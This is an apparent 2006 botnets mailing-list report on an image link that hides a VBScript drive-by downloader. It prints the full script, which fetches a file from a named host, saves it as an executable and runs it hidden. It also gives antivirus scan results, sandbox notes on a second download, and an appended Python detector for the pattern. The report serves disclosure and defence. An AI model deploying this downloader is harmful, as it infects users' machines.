Tom
Fri, 29 Dec 2006 09:07:33 -0800
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------

This one was new to me. A gif that wasn't. Came via email. Link was to http://lulavergonha.rg3.net which framed a gif (http://mywebpage.netscape.com/lu7y7u/lula.gif) that Firefox would not deal with. Does Explorer really open these? Anyway, content of gif had javascript to download the malware (beware: below is an active link as of this email):

<script language="VBScript">
on error resume next
' due to how ajax works, the file MUST be within the same local domain
dl = "http://mywebpage.netscape.com/lu7y7u/lula.cmd"
' create adodbstream object
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
' xml ajax req
str6="GET"
x.Open str6, dl, False
x.Send
' Get temp directory and create our destination name
fname1="pork.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) ' Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
' open adodb stream and write contents of request to file
' like vbs dl exec code
S.write x.responseBody
' Saves it with CreateOverwrite flag
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>

[ scan result ]
AntiVir 7.3.0.21/20061229 found [TR/Delphi.Downloader.Gen]
Authentium 4.93.8/20061229 found nothing
Avast 4.7.892.0/20061221 found nothing
AVG 386/20061229 found nothing
BitDefender 7.2/20061229 found [Trojan.Downloader.Banload.MG]
CAT-QuickHeal 8.00/20061229 found nothing
ClamAV devel-20060426/20061229 found nothing
DrWeb 4.33/20061229 found nothing
eSafe 7.0.14.0/20061228 found nothing
eTrust-InoculateIT 23.73.101/20061229 found nothing
eTrust-Vet 30.3.3289/20061229 found nothing
Ewido 4.0/20061229 found [Downloader.Delf.acn]
F-Prot 3.16f/20061229 found nothing
F-Prot4 4.2.1.29/20061229 found nothing
Fortinet 2.82.0.0/20061229 found nothing
Ikarus T3.1.0.27/20061229 found [Trojan-Downloader.Win32.Dadobra.CV]
Kaspersky 4.0.2.24/20061229 found nothing
McAfee 4928/20061228 found nothing
Microsoft 1.1904/20061227 found nothing
NOD32v2 1946/20061229 found [probably a variant of Win32/TrojanDownloader.Banload.BAY]
Norman 5.80.02/20061229 found [W32/Downloader]
Panda 9.0.0.4/20061228 found [Suspicious file]
Prevx1 V2/20061229 found nothing
Sophos 4.13.0/20061228 found nothing
Sunbelt 2.2.907.0/20061218 found nothing
TheHacker 6.0.3.139/20061229 found nothing
UNA 1.83/20061228 found nothing
VBA32 3.11.1/20061229 found nothing
VirusBuster 4.3.19:9/20061229 found nothing

[ notes ]
norman sandbox:
[ General information ]
 * **IMPORTANT: PLEASE SEND THE SCANNED FILE TO: [EMAIL PROTECTED] - REMEMBER TO ENCRYPT IT (E.G. ZIP WITH PASSWORD)**.
 * File length: 43520 bytes.
[ Changes to filesystem ]
 * Creates file C:\WINDOWS\SYSTEM32\imgrt.scr.
[ Network services ]
 * Downloads file from http://www.aquipodeserbom.xpg.com.br/firma01.bmp as C:\WINDOWS\SYSTEM32\imgrt.scr.
[ Security issues ]
 * Starting downloaded file - potential security problem.

-- 
Tom Shaw - Chief Engineer, OITC
<[EMAIL PROTECTED]>, http://www.oitc.com/
US Phone Numbers: 321-984-3714, 321-729-6258(fax), 321-258-2475(cell/voice mail,pager)
Text Paging: http://www.oitc.com/Pager/sendmessage.html
AIM/iChat: [EMAIL PROTECTED]  Google Talk: [EMAIL PROTECTED]  skype: trshaw

_______________________________________________
All list and server information are public and available to law enforcement upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
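A detector for the trick in the post above (a URL served as a .gif that actually carries a VBScript dropper, with the ADODB.Stream name split across variables), added here as example code that is not part of Tom's message. It folds simple string concatenations before matching so the hidden object name is still caught, and flags the CLSID the script instantiates, which belongs to the RDS.DataSpace control patched in MS06-014; the embedded sample is constructed to mirror the pattern, not the live file.

```python
import re

GIF_MAGIC = (b"GIF87a", b"GIF89a")
RDS_CLSID = "bd96c556-65a3-11d0-983a-00c04fc29e36"  # RDS.DataSpace (MS06-014)
SUSPECT = ("adodb.stream", "microsoft.xmlhttp",
           "scripting.filesystemobject", "shell.application")
ASSIGN_RE = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$", re.M)
LITERAL_RE = re.compile(r'"([^"]*)"')

def fold_strings(script):  # fold a1="Ado", s=a1&a2 into literal values
    env = {}
    for name, expr in ASSIGN_RE.findall(script):
        value = ""
        for part in (p.strip() for p in expr.split("&")):
            if len(part) >= 2 and part[0] == part[-1] == '"':
                value += part[1:-1]
            elif part.lower() in env:
                value += env[part.lower()]
            else:
                value = None  # call or unknown name: skip this line
                break
        if value is not None:
            env.setdefault(name.lower(), value)
    return env

def scan_content(data, claimed_type="gif"):
    findings = []  # one string per suspicious trait
    if claimed_type == "gif" and not data.startswith(GIF_MAGIC):
        findings.append("no GIF header: the image is not an image")
    text = data.decode("latin-1")
    if re.search(r"<script[^>]*vbscript", text, re.I):
        findings.append("VBScript block embedded in image content")
    if RDS_CLSID in text.lower():
        findings.append("RDS.DataSpace CLSID (MS06-014 target)")
    literals = {s.lower() for s in LITERAL_RE.findall(text)}
    folded = {v.lower() for v in fold_strings(text).values()}
    for obj in SUSPECT:
        if obj in literals:
            findings.append(f"creates {obj}")
        elif obj in folded:
            findings.append(f"creates {obj} (name hidden by concatenation)")
    return findings

# Constructed sample mirroring the posted script's pattern; not the live file.
SAMPLE = b'''<script language="VBScript">
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
a1="Adodb."
a2="Stream"
str1=a1&a2
</script>'''
```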